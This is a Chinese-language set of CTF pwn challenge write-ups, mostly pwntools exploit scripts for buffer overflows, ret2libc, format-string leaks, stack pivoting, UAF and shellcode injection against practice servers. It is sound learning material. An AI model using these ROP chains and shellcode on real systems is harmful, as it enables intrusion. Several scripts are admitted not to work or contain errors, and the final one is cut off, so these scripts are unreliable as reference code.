PWN刷题解析
[SWPUCTF 2021 新生赛]gift_pwn
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28785)
payload=b'a'*0x18+p64(0x4005B6)
p.send(payload)
p.interactive()
[CISCN 2019华北]PWN1
这个题直接覆盖掉v1让其溢出后直接到return
from pwn import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28536)
payload=b'a'*(0x30+0x8)+p64(0x4006BE)
p.send(payload)
p.interactive()
当然也能让v1溢出使v2等于那个让其执行return
tips:11.28125表示在内存存储就是0x41348000
from pwn import *
xianyufen=remote("node1.anna.nssctf.cn",28029)
payload=b'a'*0x2C+p64(0x41348000)
xianyufen.send(payload)
xianyufen.interactive()
[BJDCTF 2020]babystack2.0
这个题判断点在于无符号类型因为里面的
if ( (int)nbytes > 10 ) read(0, buf, (unsigned int)nbytes);
因为buf的溢出要0x18但是nbytes只能是<10所以我们就要使用无符号类型让它等于-1然后就能读取很多产生溢出
from pwn import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28867)
payload=b'a'*0x18+p64(0x400726)
p.sendlineafter('name:','-1')
p.sendlineafter('name?',payload)
p.interactive()
[NISACTF 2022]ReorPwn?
这个题注意他的fun函数里面给你的顺序逆了一下,下面就是system,那直接使用payload数组逆位一下
from pwn import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28301)
comm='cat /flag'
a=comm[::-1]
p.sendlineafter('lleT:',a)
p.interactive()
[BJDCTF 2020]babystack
这个题就更简单了,像前面那个题,这个题还不需要判断read的长度随便输就行能达到溢出点就行
from pwn import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28240)
payload=b'a'*0x18+p64(0x4006E6)
p.sendlineafter('name:','-1')
p.sendlineafter('name?',payload)
p.interactive()
[NISACTF 2022]ezstack
打开后用ida查看到代码里面没有system(‘/bin/sh’)但是有system并且在data段里面有/bin/sh那我们直接让代码溢出调用system和/bin/sh
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28961)
payload=b'a'*(0x48+0x4)+p32(0x08048512)+p32(0x804A024)
p.sendlineafter('NISACTF',payload)
p.interactive()
[watevrCTF 2019]Voting Machine 1
这个题有两个解法,输入0x2或者0xa
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28788)
#p=process('./ctf')
#gdb.attach(p)
payload=b'a'*(0xa)+p64(0x400807)
p.sendlineafter("Vote:",payload)
p.interactive()
[NISACTF 2022]ezpie
这种题要注意流程化,先看因为开启了pie地址随机化就得去算他们的偏移量因为得到了main函数地址所以就直接构造
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28694)
elf=ELF('./pw')
shell=elf.sym['shell']
main=elf.sym['main']
offset=shell-main
log.info('offset is :%x'%offset)
p.recvuntil('gift!\n')
main_addr=int(p.recv(10).decode(),16)
p_shell_addr=main_addr+offset
log.info('main_addr is %x'%main_addr)
log.info('shelloffset is %x'%p_shell_addr)
payload=b'a'*(0x28+0x4)+p32(p_shell_addr)
p.sendlineafter('Input:',payload)
p.interactive()
[2021 鹤城杯]babyof
这个题是一个ret2libc的题首先要泄露出一个libc基地址然后才能得到其他的地址
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
program = "./babyof"
p = remote('node4.anna.nssctf.cn',28666)#process(program)
elf = ELF(program)
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi = 0x400743
pop_ret = 0x400506
__start = 0x400550
payload = b'a'*(0x40+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(__start) #//跳转到rdi寄存器上面然后在通过puts函数来打印puts的got在通过ret到起始位置让下面的payload生效
p.sendlineafter("Do you know how to do buffer overflow?\n",payload)
p.recvuntil("I hope you win\n")
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) #\\接收puts的got地址因为栈地址一般是由\x7f开头的自动补全8位
log.info('puts addr is %x'%puts_addr)
libc = LibcSearcher('puts',puts_addr) #\\利用puts_addr在LibcSearcher里面查找对映的库
libc_addr = puts_addr-libc.dump('puts') #\\利用puts_addr(动态地址)减去puts的函数偏移量即可得到libc的基地址
bin_sh_str=libc_addr+libc.dump('str_bin_sh') #\\下面的得到基地址后都加上偏移量就能得到对应的函数了
system=libc_addr+libc.dump('system')
log.info('libc addr is %x'%libc_addr)
log.info('bin_sh_str is %x'%bin_sh_str)
payload2 = b'a'*(0x40+8)+p64(pop_ret)+p64(pop_rdi)+p64(bin_sh_str)+p64(system)+p64(__start) #\\使用一个ret来跳转到pop_rdi然后就利用system(/bin/sh)即可
p.sendlineafter("Do you know how to do buffer overflow?\n",payload2)
p.interactive()
[GFCTF 2021]where_is_shell
可以利用system($0)获得shell权限,$0在机器码中为\x24\x30
from pwn import *
elf = ELF('./shell')
local = 1
if local ==0:
p = process('./shell')
else:
p = remote('node4.anna.nssctf.cn',28616)
ret_addr = 0x400416 # ROPgadget --binary shell --only 'ret'
pop_rdi_ret = 0x4005e3 # ROPgadget --binary shell --only 'pop|rdi|ret'
tips = 0x400541
system_addr = elf.symbols['system']
payload = b'b'*0x10+b'b'*8+p64(ret_addr)+p64(pop_rdi_ret)+p64(tips)+p64(system_addr)
p.sendlineafter('find it?\n',payload)
p.interactive()
[SWPUCTF 2021 新生赛]whitegive_pwn
这个题的话和babyof的题差不多就是一个ret2libc的题但是这个题的libc.so有问题打不进去代码如下
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
program = "./Desktop/附件"
p = remote('node5.anna.nssctf.cn',28406)#process(program)
elf = ELF(program)
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi = 0x400763
pop_ret = 0x400509
__start = 0x400570
payload = b'a'*(0x10+0x8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(__start)
p.sendline(payload)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) #\\接收puts的got地址因为栈地址一般是由\x7f开头的自动补全8位
log.info('puts addr is %x'%puts_addr)
libc = LibcSearcher('puts',puts_addr) #\\利用puts_addr在LibcSearcher里面查找对映的库
libc_addr = puts_addr-libc.dump('puts') #\\利用puts_addr(动态地址)减去puts的函数偏移量即可得到libc的基地址
bin_sh_str=libc_addr+libc.dump('str_bin_sh') #\\下面的得到基地址后都加上偏移量就能得到对应的函数了
system=libc_addr+libc.dump('system')
log.info('libc addr is %x'%libc_addr)
log.info('bin_sh_str is %x'%bin_sh_str)
payload2 = b'a'*(0x40+8)+p64(pop_ret)+p64(pop_rdi)+p64(bin_sh_str)+p64(system)+p64(__start) #\\使用一个ret来跳转到pop_rdi然后就利用system(/bin/sh)即可
p.sendline(payload2)
p.interactive()
还有个大佬用的裸so打进去的
from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('node5.anna.nssctf.cn',28820)
elf = ELF('./pw')
def debug():
gdb.attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
rdi = 0x400763
payload = b'a'*0x18 + p64(rdi) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(elf.sym['vuln'])
p.sendline(payload)
libc_base = get_addr() - 0x06f6a0
system = libc_base + 0x0453a0
binsh = libc_base + 0x18ce57
payload = b'a'*0x18 + p64(rdi) + p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()
[CISCN 2019东北]PWN2
这又是个ret2libc的体型直接打
from pwn import *
from LibcSearcher import *
context(os='linux',log_level='debug')
elf=ELF("./pwn2")
p=remote('node5.anna.nssctf.cn',28652)
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
start=0x400790
ret=0x4006b9
rdi_ret=0x400c83
payload=b'a'*0x58+p64(rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
p.sendlineafter('choice!','1')
p.sendlineafter('encrypted',payload)
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
log.info('puts addr is %x'%puts_addr)
libc=LibcSearcher('puts',puts_addr)
libc_addr=puts_addr-libc.dump('puts')
system_addr=libc_addr+libc.dump('system')
str_bin_sh=libc_addr+libc.dump('str_bin_sh')
payload2=b'a'*0x58+p64(ret)+p64(rdi_ret)+p64(str_bin_sh)+p64(system_addr)+p64(start)
p.sendlineafter('choice!','1')
p.sendlineafter('encrypted',payload2)
p.interactive()
[WUSTCTF 2020]getshell
这个拿到flag后交不了
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28667)
system_addr=0x804851B
payload=b'a'*(0x18+0x4)+p32(system_addr)
p.sendline(payload)
p.interactive()
[GDOUCTF 2023]EASY PWN
本地运行发现多输入几位发现提示没有flag.txt可以猜到直接nc连接多输入几位即可得到flag,虽然得到了flag但是还是要分析一下这个程序,使用checksec后可以查看这个开启了地址随机化那打开ida发现这个main调用check然后在调用printflag,然后我们还是写个脚本
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28563)
payload=b'a'*50
p.send(payload)
p.interactive()
[HNCTF 2022 Week1]ret2shellcode
这个题要注意c语言的几个函数memset、strcpy、mprotect其中mprotect是赋权限strcpy是复制然后memset是设置前面的字符替换为指定字符
按照题目标题的话我们直接写入shellcode造成溢出然后在调用buff函数即可,因为shellcode写入的话strcpy将我们写入的shellcode写入到了buff字段
buff字段可以直接去.bss查看
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=remote('node5.anna.nssctf.cn',28457)
shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(0x108,b'a')+p64(0x4040A0)
p.sendline(payload)
p.interactive()
[2021 鹤城杯]littleof
注意canary保护绕过方法注意使用方法nssctf上的环境有问题我的poc打不进去只有用这个
from pwn import *
from LibcSearcher import *
context(os='linux',log_level='debug')
#p = process('./pwn')
p = remote('node4.anna.nssctf.cn',28316)
elf = ELF('./littleof')
def debug():
gdb.attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# leak canary
payload = b'a'*0x49
p.sendafter(b'overflow?', payload)
p.recvuntil(payload)
canary = u64(p.recv(7).rjust(8, b'\x00'))
log.info('canary addr is %x'%canary)
# leak libc_base
rdi = 0x400863
ret = 0x40059e
payload = b'a'*0x48 + p64(canary) + p64(0) + p64(rdi) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(0x4006e2)
p.sendafter(b'harder!', payload)
libc_base = get_addr() - 0x080aa0
# leak canary
payload = b'a'*0x49
p.sendafter(b'overflow?', payload)
p.recvuntil(b'a'*0x49)
canary = u64(p.recv(7).rjust(8, b'\x00'))
log.info('canary addr is %x'%canary)
# get shell
system = libc_base + 0x04f550
binsh = libc_base + 0x1b3e1a
payload = b'a'*0x48 + p64(canary) + p64(0) + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
p.sendafter(b'harder!', payload)
p.interactive()
[HNCTF 2022 Week1]easyoverflow
又是一个栈不稳定直接cat flag的题源代码是
#include<stdio.h>
int main()
{
setbuf(stdin,0);
setbuf(stdout,0);
setbuf(stderr,0);
puts("Input something");
char name[30];
int number=0;
gets(name);
if(number!=0){
puts("You win.");
system("cat flag");
}
return 0;
}
保护全关直接让name溢出后即可
from pwn import *
p=remote('1.1.1.1',11)
payload=b'a'*50
p.send(payload)
p.interactive()
[NSSCTF 2022 Spring Recruit]R3m4ke?
一个很简单达到payload的题
from pwn import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28195)
payload=b'a'*0x28+p64(0x40072C)
p.sendlineafter('started>',payload)
p.interactive()
[HNCTF 2022 Week1]fmtstrre
字符串溢出直接查看name在bss里面的位置直接打就行注意栈平衡
%38$s直接获得flag
[GDOUCTF 2023]Shellcode
read储存name在bss段上面,并且可以写入25的字节长度但是shellcraft默认生成的字节数是44位长度,那我们直接去网上找一个小于25字节的shellcode
from pwn import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28735)
shellcode='\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
name=0x6010A0
p.sendlineafter('lease.',shellcode)
payload=b'a'*(0xA+0x8)+p64(name)
p.sendlineafter('start!',payload)
p.interactive()
这个题应该还能够ret2libc但是我打出来有点问题
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28010)
rdi_pop=0x4007b3
ret=0x40028e
elf=ELF('pw')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=0x400687
p.sendlineafter('lease.','1')
payload1=b'a'*(0xA+0x8)+p64(rdi_pop)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendlineafter('start!',payload1)
puts_ad=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.info('puts_ad is %x'%puts_ad)
libc=LibcSearcher('puts',puts_ad)
libc_base=puts_ad-libc.dump('puts')
sys_addr=libc_base+libc.dump('system')
str_bin_sh=libc_base+libc.dump('str_bin_sh')
p.sendlineafter('lease.','1')
log.info(sys_addr)
log.info(str_bin_sh)
payload2=b'a'+(0xA+0x8)+p64(ret)+p64(rdi_pop)+p64(str_bin_sh)+p64(sys_addr)+p64(main)
p.sendlineafter('start!',payload2)
p.interactive()
[HNCTF 2022 Week1]ezr0p32
把/bin/sh写在.bss上然后直接打
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28655)
p.sendlineafter('name','/bin/sh')
payload=b'a'*(0x1c+0x4)+p32(0x080483d0)+p32(0)+p32(0x0804A080)
p.sendlineafter('time~',payload)
p.interactive()
[深育杯 2021]find_flag
这个题涉及的知识点有点多毕竟保护全开,打开ida查看到sub函数里面的有个字符串溢出可以得到canary和基地址,用gdb因为开启了ple不能在main函数上下断点就只有下在printf上了然后调试你可以用stack查看到rbp上面的地址是****00可以猜到这个就是canary了因为canary一般情况下都是以00结尾的,canary保护主要是通过在栈下设置一个地址,返回是也必须带上那个地址不然就会触发保护,然后ple保护的话主要是通过每次修改.text、.data的地址。tips:使用pwngdb可以利用fmtarg来得到栈偏移量
from pwn import *
from LibcSearcher import *
import time
elf=ELF('find_flag')
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28437)
p.sendlineafter('name?','%17$p---%19$p')
p.recvuntil('you, ')
a=p.recv(18)
p.recvuntil('---')
b=p.recv(14)
a=int(a,16)
b=int(b,16)
log.info(a)
log.info(b)
base=b-0x146F
system=base+elf.sym['system']
log.info('system addr is %x'%system)
cat=base+0x2004
rdi=base+0x14E3
ret=base+0x101A
payload=b'a'*0x38+p64(a)+p64(0)+p64(ret)+p64(rdi)+p64(cat)+p64(system)
p.sendlineafter('else? ',payload)
p.interactive()
[HDCTF 2023]pwnner
这个题又让我学到了伪随机数这个srand(0x38)控制着rand的随机大小只需要使用python库的ctypes只要有srand就能得到rand的大小
libc = ctypes.CDLL("libc.so.6")
libc.srand.argtypes = [ctypes.c_uint]
libc.srand(0x39)
rand_result = libc.rand()
最后代码如下
from pwn import *
import ctypes
context(arch='amd64',os='linux',log_level='debug')
libc=ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
p=remote('node5.anna.nssctf.cn',28917)
libc.srand.argtypes=[ctypes.c_uint]
libc.srand(0x39)
rand_result=libc.rand()
p.sendlineafter('name:',str(rand_result))
payload=b'a'*(0x40+0x8)+p64(0x4008B2)
p.sendline(payload)
p.interactive()
[LitCTF 2023]口算题卡
口算题要么口算要么写个脚本我这么懒肯定是
from pwn import *
p=remote('node4.anna.nssctf.cn',28904)
context(log_level='debug',os='linux')
while 1:
eval_1=0
payload=0
p.recvuntil('What is ')
eval_1=p.recvuntil(b'?')[:-1]
log.info(eval_1)
payload=eval(eval_1)
p.send(str(payload))
p.recvline()
[SWPUCTF 2022 新生赛]有手就行的栈溢出
看到危险函数栈溢出后跳转到execve即可
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28296)
payload=b'a'*(0x20+0x8)+p64(0x401257)
p.sendline(payload)
p.interactive()
[NISACTF 2022]ezheap
这题还没来得及打开看就出了,直接运行发现输入很多下面的报错是sh,并且提示哪里多了,那我们就直接卡溢出那里运行就好
[WUSTCTF 2020]getshell2
sh相当于执行/bin/sh
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28650)
payload=b'a'*(0x18+0x4)+p32(0x8048529)+p32(0x08048670)
p.sendline(payload)
p.interactive()
[NISACTF 2022]UAF
新手的第一个uaf题目这个题目很友好让我不太难受,checksec看一下就明白开启了canary,但是没有泄露我在stack上准备泄露他但是不行,直接死循环,32位拖进ida看f5了,发现f5里面的函数有很多,并且逻辑分明,那只有慢慢审计了,看main函数发现是一个菜单有create、edit、del、show,并且里面还有一个system,感觉像是看到了新大陆一样,根据题目来就是uaf,百度搜索一下就能发现free的漏洞,使用了malloc分配了内存空间给一个数字但是free没有清空只是暂时释放了,只要下一个同样申请一样的内存的话内存地址就会一样,再看edit能发现这个if语句能够修改0并且在里面输入值,然后就是del,使用free释放空间,在之后就是show来查看edit写入的值,那就可有来构造uaf漏洞了。
``如果说有要注意的,就是利用 show 功能 get_shell 的时候只能使用索引为 0 的堆块,而 edit 不能编辑索引为 0 的堆块,所以就要用到 UAF 了因为if ( v1 <= 0 || v1 > i )其中0可以通过
from pwn import *
p=remote('node4.anna.nssctf.cn',28338)
context(log_level='debug',os='linux')
def create():
p.sendlineafter(':','1')
def edit(index,string):
p.sendlineafter(':','2')
p.sendlineafter('page',index)
p.sendlineafter('strings',string)
def dela(index):
p.sendlineafter(':','3')
p.sendlineafter('page',index)
def show(index):
p.sendlineafter(':','4')
p.sendlineafter('page',index)
create()
dela('0')
create()
payload=b'sh;\x00'+p32(0x8048642)
edit('1',payload)
show('0')
p.interactive()
[BJDCTF 2020]babyrop
本题使用的是libc6_2.23-0ubuntu11_amd64
from pwn import *
import time
from LibcSearcher import *
context(log_level='debug',os='linux')
a=0
if a:
p=process('./pw')
else:
p=remote('node4.anna.nssctf.cn',28892)
elf=ELF('./pw')
rdi_pop=0x400733
ret=0x4004c9
main=elf.sym['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
payload=b'a'*(0x20+0x8)+p64(rdi_pop)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendlineafter('story!',payload)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.info(puts)
libc=LibcSearcher('puts',puts)
libc_base=puts-libc.dump('puts')
system=libc_base+libc.dump('system')
str_bin_sh=libc_base+libc.dump('str_bin_sh')
payload2=b'a'*(0x20+0x8)+p64(ret)+p64(rdi_pop)+p64(str_bin_sh)+p64(system)+p64(main)
p.sendline(payload2)
p.interactive()
[HNCTF 2022 Week1]safe_shellcode
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28251)
payload="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N00gao@fossa"
p.send(payload)
p.interactive()
[HGAME 2022 week1]test your gdb
#p = process("./../testYourGdb")
elf = ELF("./../testYourGdb")
p = remote("1.14.71.254",28150)
cmpText = p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9)
binsh = 0x401256
p.recvuntil(b'word\n')
p.send(cmpText)
p.recv(0x18)
canary = u64(p.recv(8))
print(hex(canary))
padding = b'a' * (0x28 - 0x10)
payload = padding + p64(canary) + p64(0) + p64(binsh)
p.sendline(payload)
p.recv()
p.interactive()
[HNCTF 2022 Week1]ezr0p64
已经给了.so.6了直接打ret2libc
from pwn import *
context.log_level='debug'
context.os='linux'
elf=ELF('./ezrop64')
libc=ELF('./libc.so.6')
p=remote('node5.anna.nssctf.cn',28053)
pop_rdi_ret = 0x4012a3
ret = 0x40101a
vuln = elf.sym['vuln']
p.recvuntil(b":")
puts_addr = int(p.recv(14),16)
log.info(puts_addr)
libc_base = puts_addr - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b"/bin/sh\x00"))
payload = b'a'*0x108 + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()
[GDOUCTF 2023]真男人下120层
套着两层rand需要定义两次srand使用python的ctypes的库来进行解题
from pwn import *
import ctypes
libc=ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand.argtypes=[ctypes.c_uint]
libc.srand(libc.time(0))
rand_result=libc.rand()
libc.srand(rand_result%3-1522127470)
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28105)
p.recvuntil('trap.')
for i in range(120):
rand_r=libc.rand()%4+1
p.recvuntil(b'Floor')
p.sendline(str(rand_r))
p.interactive()
[HUBUCTF 2022 新生赛]fmt
本地测试查看flag.txt被读后的栈地址看到偏移多少利用%p来获得flag
from pwn import *
p=remote('node5.anna.nssctf.cn',28473)
# get flag
# 根据 format 和 s 在栈上的相对位置计算读取位置:(0x60 - 0x40 / 8) + 5 = 12
flag_addr = 12
flag = ''
while True:
p.sendlineafter(b'Echo as a service', '%{}$p'.format(flag_addr))
p.recvuntil(b'0x')
part = p.recvuntil(b'\n')[:-1]
for i in range(0, len(part), 2):
index = len(part) - i
flag += chr(int(part[index - 2:index].ljust(2, b'0'), 16))
print(flag)
if '}' in flag:
break
flag_addr += 1
[HNCTF 2022 Week1]ezcmp
ida查看到他必须要和buf相同才能得到shell那我们就去gdb调试查看buff的值x/10a可以查看到buff的值段把他输进buf即可
from pwn import *
#context(log_level='debug')
p=remote('node5.anna.nssctf.cn',28286)
payload=p64(0x144678aadc0e4072)+p64(0x84b6e81a4c7eb0e2)+p64(0xf426588abcee2052)+p64(0xc8cb2c5e90c2)
p.sendline(payload)
p.interactive()
[LitCTF 2023]狠狠的溢出涅~
新知识\x00能够截断strlen
from pwn import *
import time
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(str(delim), data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(str(delim), data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
binary = './pwn4'
libelf = './libc-2.31.so'
target = ''
target = ''
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tme?mux','splitw','-h','-l','130']
io = remote('node4.anna.nssctf.cn',28710)
#io = process(binary)
pad = 0x68
elf = ELF(binary)
rop = ROP(binary)
libc = ELF(libelf)
pop_rdi_ret = rop.find_gadget(['pop rdi','ret'])[0]
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
vuln = 0x4006B0
ret = 0x0400768
pay = pad * b'\x00' + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln)
sl(pay)
ru('Received\n')
x = uu64(r(6))
libc_base = x - libc.sym['puts']
system = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
ls(hex(libc_base))
pay = pad * b'\x00' + p64(ret)*1 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system) + p64(vuln)
sl(pay)
sl('ls')
sl('cat flag')
io.interactive()
[HNCTF 2022 WEEK2]ez_backdoor
from pwn import *
import time
io = remote('node5.anna.nssctf.cn',28762)
context(log_level='debug')
#io = process(binary)
bin_sh=0x4011CA
ret=0x40101a
payload=b'a'*(0x108)+p64(ret)+p64(bin_sh)
io.sendafter(b'llenge\n',payload)
io.interactive()
[NISACTF 2022]shop_pwn
ida查看game函数里面有一个函数来创建多线程,但是有个bug,money是公共资源,这个线程创建时另外一个线程也创建了,如果太快会造成都在卖那个pen直接构造一个
echo -e "3\n0\n3\n0\n2\n1\n1\"|nc node5.anna.nssctf.cn 28765
即可查看到flag
[HDCTF 2023]KEEP ON
这个题注意的字符串溢出是一个点还能够利用栈迁移来获取shell,字符串溢出的话是利用printf的溢出点是6然后使用fmtstr_payload来让system_plt来和printf_got进行切换在利用后面那个read允许溢出8个字节来返回到vuln去在字符串溢出这里输入/bin/sh即可得到shell
from pwn import *
context(arch='amd64', os='linux')
context.log_level = 'debug'
elf = ELF("./hdctf")
#p = process('./hdctf')
p = remote("node4.anna.nssctf.cn",28307)
system_plt = elf.plt['system']
printf_got = elf.got['printf']
#gdb.attach(p)
#pause()
payload1 = fmtstr_payload(6, {printf_got: system_plt})
log.info(payload1)
sleep(0.1)
p.sendafter('name: \n',payload1)
vuln_addr = 0x40076F
#pause()
payload2 =b'a'*(0x50+0x8) + p64(vuln_addr)
sleep(0.1)
p.sendafter('on !\n',payload2)
#pause()
sleep(0.1)
p.sendafter('name: \n',"/bin/sh\x00")
p.interactive()
还能使用栈迁移如:
使用字符串泄露来得到rbp栈底位置,使用stack查看rbp是多少在使用溢出满满调试得到为%16p即可得到rbp,在s处输入字符后使用pwndbg的search查看位置,然后在计算和s的值相差多少,使用pwndbg的distance即可计算出相差量为60,rbp和s相差0x60还有0x8的返回地址,即可算到需要迁移的栈地址为多多qianyi_rbp-0x60-0x8,在使用常规的rdi pop;ret来将/bin/sh压入system函数中,但是中间需要加一个qianyi_rbp-0x20来维持栈平衡
from pwn import *
context(log_level='debug',os='linux')
io=remote('node4.anna.nssctf.cn',28526)
io.recvuntil(b'name: \n')
elf=ELF('./hdctf')
fmtpayload = b'%16$p'
io.send(fmtpayload)
io.recvuntil(b'hello,0x')
old_rbp = int(io.recv(12), 16)
log.success('RBP Addr: ' + (hex(old_rbp)))
leave_ret = 0x4007F2
rdi = 0x4008D3
system = elf.sym['system']
Target_Addr = old_rbp - 0x60 - 0x08
# RDI will pop binsh addr as system's arg
# Offset : 0x08
Payload = p64(rdi)
# Offset : 0x08 + 0x08
Payload += p64(Target_Addr + 0x8 + 0x18)
# Offset : 0x08 + 0x10
Payload += p64(system)
# Offset : 0x08 + 0x18
Payload += b'/bin/sh\x00'
# Fill the Payload to 0x50.
Payload = Payload.ljust(0x50, b'\x00')
# The Leave Ret cmd's ret addr.
Payload += p64(Target_Addr)
# The Leave Ret
Payload += p64(leave_ret)
log.info(Payload)
io.recvuntil(b'keep on !\n')
io.send(Payload)
io.interactive()
[SWPUCTF 2022 新生赛]shellcode?
还不能输入比较长的我用shellcraft.sh()生成不行
[NUSTCTF 2022 新生赛]ezPwn
什么判断直接不管gets溢出后直接跳转到system地址即可
from pwn import *
p=remote()
elf=ELF('./pwn')
payload=cyclic(0x12)+p64(elf.sym['system'])
p.send(payload)
p.interactive()
[HGAME 2023 week1]easy_overflow
很简单的一个ret2text但是有个坑点就是close(1)这个点你需要连上去后使用exec 1>&0来打开标准输出
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28539)
payload=b'a'*0x18+p64(0x40101a)+p64(0x401176)
p.send(payload)
p.interactive()
[CISCN 2022 初赛]login_normal
这个题考点在于代码审计
from pwn import *
context.log_level='debug'
context.arch='amd64'
io=remote("node4.anna.nssctf.cn",28823)
#io=process('./login')
io.recvuntil("=================")
#gdb.attach(io)
payload = b'opt:1\nmsg:ro0tt\n'
#gdb.attach(io)
io.sendline(payload)
#shellcode = shellcraft.sh()
shellcode=b"RRYh00AAX1A0hA004X1A4hA00AX1A8QX44Pj0X40PZPjAX4znoNDnRYZnCXAA"
payload = b'opt:2\nmsg:'+shellcode+b'\n'
io.recvuntil(">>> ")
#gdb.attach(io)
io.sendline(payload)
io.interactive()
[SWPUCTF 2022 新生赛]Darling
随机数srand
from pwn import *
import ctypes
libc=ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0x1317E53)
sl=libc.rand()%100-64
p.sendline(str(sl))
p.interactive()
[UUCTF 2022 新生赛]babystack
from pwn import *
context(log_level='debug',os='linux')
p=remote('node5.anna.nssctf.cn',28003)
payload=b'a'*0x108+p64(0x0400591)+p64(0x400726)
p.sendlineafter('name?',payload)
p.interactive()
[CISCN 2019东南]PWN2
这个题很不错适合新手吃32位的栈偏移
from pwn import *
context(arch='i386',log_level='debug')
leave_ret=0x080485FD
offset=0xffffcd58-0xffffcd20
io=process('./pwn')
io=remote('node5.anna.nssctf.cn',28203)
elf=ELF('./pwn')
# 第一次溢出1字节覆盖\x00,泄露ebp
io.sendafter(b'name?\n',b'a'*(0x28-1)+b'b')
io.recvuntil(b'aaab')
leak_ebp=u32(io.recvuntil(b'\xff'))
success(hex(leak_ebp))
target_addr=leak_ebp-offset-0x4 # -0x4是因为第二次leave;ret的时候,pop esp会导致+0x4
# 第二次溢出,rop写在s中,栈迁移到s,调用system,参数为自己写在栈上的/bin/sh,参数偏移计算可
payload=p32(elf.plt['system'])+p32(elf.sym['_start'])+p32(leak_ebp-offset+0xc)+b'/bin/sh\x00'
payload=payload.ljust(0x28,b'a')+p32(target_addr)+p32(leave_ret)
io.send(payload)
io.interactive()
[CISCN 2023 初赛]烧烤摊儿
这是一个64位的ret2syscall注意execve调用位64是59,或者可以直接使用ropgadget的ropchain来直接生成payload首先审计源码利用负数达到金额然后在利用改名里面的溢出达到shell,注意这个是静态
from pwn import *
from struct import pack
io=remote('node4.anna.nssctf.cn',28947)
context.log_level='debug'
io.sendline(str(1))
io.sendline(str(1))
io.sendline(str(-10000))
io.sendline(str(4))
io.sendline(str(5))
p = b''
